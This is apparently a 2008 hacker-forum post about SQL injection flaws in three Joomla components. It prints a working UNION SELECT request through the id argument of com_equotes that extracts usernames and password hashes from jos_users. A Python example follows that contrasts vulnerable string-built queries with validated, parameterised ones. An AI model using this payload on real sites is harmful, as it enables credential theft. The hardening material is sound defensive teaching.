Hacker Forums

Joomla components suffer SQL injection risks.


by The Uni-Hacker on Jun.04, 2008, under Misc

Three Joomla components have been found to have serious security issues: all three are susceptible to remote SQL injection via HTTP GET. The affected components are Joomla iDoBlog, Joomla Radio, and Joomla Quotes. The exploit was released today; yesterday, two other Joomla components had similar SQL injection issues.

The recent SQL injection exploits for these components raise the question of the integrity and security of the software. As it stands now, users shouldn't be using Joomla components if they don't know how to check for this sort of exploit.

SQL can be passed to all three components through the id argument.

http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13
and 1=1 UNION SELECT user(), user(),user(),user(),user(), concat(username,0x3a,password),
user(),user(),user(),user(),user(),user(), user(),user(),user(), user() FROM jos_users
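
What to look for when checking a component for this flaw, as an added example that is not code from any of the three components: a query built by pasting the id argument into the SQL text, next to a hardened version. It is modelled in Python with an in-memory SQLite database so it runs offline; the jos_quotes table, the function names and all sample rows are assumptions made up for the illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a Joomla database (jos_quotes is hypothetical)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_quotes (id INTEGER PRIMARY KEY, quote TEXT);
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO jos_quotes VALUES (13, 'Constructed sample quote');
        INSERT INTO jos_users VALUES ('admin', 'constructed-hash');
    """)
    return db

def get_quote_vulnerable(db, raw_id):
    # The flaw: the id request argument is concatenated into the SQL text,
    # so everything after the number is parsed as SQL.
    sql = "SELECT quote FROM jos_quotes WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def get_quote_hardened(db, raw_id):
    # Fix 1: id must be a plain decimal integer; reject anything else.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    # Fix 2: bind the value as a parameter so it is never parsed as SQL.
    rows = db.execute("SELECT quote FROM jos_quotes WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]

# Constructed id value with the same shape as the request shown above.
INJECTED_ID = "13 and 1=1 UNION SELECT username || ':' || password FROM jos_users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:  ", get_quote_vulnerable(db, "13"))
    print("vulnerable, injected id:", get_quote_vulnerable(db, INJECTED_ID))
    print("hardened, normal id:    ", get_quote_hardened(db, "13"))
    try:
        get_quote_hardened(db, INJECTED_ID)
    except ValueError as exc:
        print("hardened, injected id:   rejected:", exc)
```

When reviewing a component's PHP source, the equivalent warning sign is a request value such as id appearing inside a query string without an integer cast or a bound parameter.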